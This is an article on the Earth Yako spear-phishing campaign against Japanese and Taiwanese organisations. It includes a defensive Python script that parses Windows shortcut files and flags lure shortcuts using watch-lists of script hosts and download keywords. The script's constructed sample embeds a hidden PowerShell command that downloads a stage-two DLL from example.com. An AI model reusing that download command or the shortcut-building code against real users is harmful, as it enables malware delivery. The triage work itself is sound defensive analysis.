Japanese entities and organisations are the latest targets of an active spear-phishing campaign dubbed Operation RestyLink, also known as Enelink. Researchers say the campaign has been active since January 2022 and has refined its tactics, techniques, and procedures (TTPs) over time.
Security researchers attribute the campaign to an APT group tracked as ‘Earth Yako’, which abuses legitimate cloud services such as Dropbox, GitHub, and Protonmail while expanding its activity across East Asia.
Initial access begins with a spear-phishing message carrying a URL. If the victim clicks it, a compressed archive or disc image (ISO) file is downloaded to the machine; inside is a malicious shortcut (LNK) file which, when opened, downloads an additional payload.
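A defender who pulls the shortcut out of such an archive or ISO wants to know what it launches before anyone double-clicks it. The script below is an added example for this article, not tooling from the researchers or from the campaign: it parses the fixed ShellLink header and the StringData section of a .lnk file as laid out in the public MS-SHLLINK specification (skipping the LinkTargetIDList and LinkInfo blocks by their declared sizes) and flags shortcuts whose target is a script host or living-off-the-land binary, whose arguments look like a download, or whose icon is borrowed from another file. The sample shortcut is constructed in the script itself, and the watch-list of binaries, the download keywords, and the example.com URL are the author's assumptions rather than indicators from the campaign.

```python
"""Triage Windows shortcut (.lnk) files extracted from a lure archive or ISO.
Added example: field layout follows the MS-SHLLINK specification; the sample
shortcut is constructed below, and the watch-lists are assumptions, not IOCs."""
import struct
import uuid
from pathlib import PureWindowsPath

LNK_CLSID = uuid.UUID("00021401-0000-0000-C000-000000000046").bytes_le
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
# StringData entries appear in this fixed order when their flag bit is set.
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                 (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location")]
# Assumed watch-list: binaries a lure shortcut typically uses to fetch stage 2.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
                "bitsadmin.exe", "curl.exe"}
DOWNLOAD_HINTS = ("http://", "https://", "downloadstring", "downloadfile",
                  "invoke-webrequest", "iwr ", "-urlcache", "/transfer")


def _read(data: bytes, fmt: str, off: int):
    """Unpack one little-endian field, refusing to run past the end of the blob."""
    size = struct.calcsize(fmt)
    if off + size > len(data):
        raise ValueError(f"truncated shortcut at offset {off}")
    return struct.unpack_from(fmt, data, off)[0], off + size


def parse_lnk(data: bytes) -> dict:
    """Return the LinkFlags and the StringData fields of a .lnk blob."""
    if len(data) < 76 or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a ShellLink header")
    flags, _ = _read(data, "<I", 20)
    off = 76                                   # end of the fixed-size header
    if flags & HAS_ID_LIST:                    # IDListSize does not count itself
        size, off = _read(data, "<H", off)
        off += size
    if flags & HAS_LINK_INFO:                  # LinkInfoSize includes itself
        size, _ = _read(data, "<I", off)
        off += size
    out = {"flags": flags}
    for bit, key in STRING_FIELDS:
        if not flags & bit:
            continue
        count, off = _read(data, "<H", off)   # CountCharacters, no terminator
        nbytes = 2 * count if flags & IS_UNICODE else count
        if off + nbytes > len(data):
            raise ValueError(f"truncated {key} string")
        raw, off = data[off:off + nbytes], off + nbytes
        # ANSI shortcuts use the system code page; cp1252 is assumed here.
        out[key] = raw.decode("utf-16-le" if flags & IS_UNICODE else "cp1252")
    return out


def suspicious_reasons(info: dict) -> list:
    """Heuristics for a lure shortcut; each is an assumption, not a signature."""
    reasons = []
    target = PureWindowsPath(info.get("relative_path", "")).name.lower()
    icon = PureWindowsPath(info.get("icon_location", "")).name.lower()
    args = info.get("arguments", "").lower()
    if target in SCRIPT_HOSTS:
        reasons.append(f"target is script host {target}")
    if any(hint in args for hint in DOWNLOAD_HINTS):
        reasons.append("arguments contain a download indicator")
    if target in SCRIPT_HOSTS and icon and icon != target:
        reasons.append(f"icon borrowed from {icon} while launching {target}")
    return reasons


def triage(data: bytes) -> dict:
    info = parse_lnk(data)
    info["reasons"] = suspicious_reasons(info)
    return info


def build_lnk(name, relative_path, working_dir, arguments, icon_location) -> bytes:
    """Assemble a minimal Unicode .lnk with a dummy one-item IDList.
    Used only to construct test samples for this example."""
    flags = (IS_UNICODE | HAS_ID_LIST | HAS_NAME | HAS_REL_PATH
             | HAS_WORK_DIR | HAS_ARGS | HAS_ICON)
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 1, 0, 0, 0, 0)   # attrs, times, SW_SHOWNORMAL
    id_list = struct.pack("<H", 4) + b"\x1f\x50" + b"\x00\x00"  # one ItemID + TerminalID
    body = struct.pack("<H", len(id_list)) + id_list
    for s in (name, relative_path, working_dir, arguments, icon_location):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


# Constructed sample: a document-looking shortcut that really runs PowerShell.
SAMPLE_LNK = build_lnk(
    name="Quarterly report",
    relative_path="..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    working_dir="C:\\Windows\\System32",
    arguments="-w hidden -nop -c \"iwr https://example.com/stage2 -OutFile $env:TEMP\\s.dll\"",
    icon_location="C:\\Windows\\System32\\shell32.dll",
)

if __name__ == "__main__":
    result = triage(SAMPLE_LNK)
    print(result["relative_path"], result["arguments"], *result["reasons"], sep="\n")
```

Run it against a shortcut lifted from a mounted ISO with `triage(open(path, "rb").read())`. The parser deliberately does not resolve the LinkTargetIDList; on real lures the target often lives only there, so a production tool would decode the IDList as well, and an absent RELATIVE_PATH should itself count as a reason to look closer.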
Besides Japan, entities in Taiwan are also targets of the Earth Yako spear-phishing campaign.
Analyses show that in addition to security researchers, intelligence groups, and academics in Japan, some Taiwanese groups and organisations have been hit by the same campaign.
The group's targeting also extends to the economic security and energy sectors.
Researchers also found that Earth Yako shares technical traits with other advanced persistent threat groups, including DarkHotel, Cozy Bear (APT29), and APT10.
Its initial-access method resembles that of DarkHotel, while encryption routines and malware families associated with APT10 have also been seen in Earth Yako's toolset.
Like Cozy Bear (APT29), Earth Yako uses ISO and LNK files in its attack chain.
The group's constantly changing TTPs indicate that it tailors its tactics to the targeted country. Organisations and companies with weak network security have been the most common victims of its campaigns.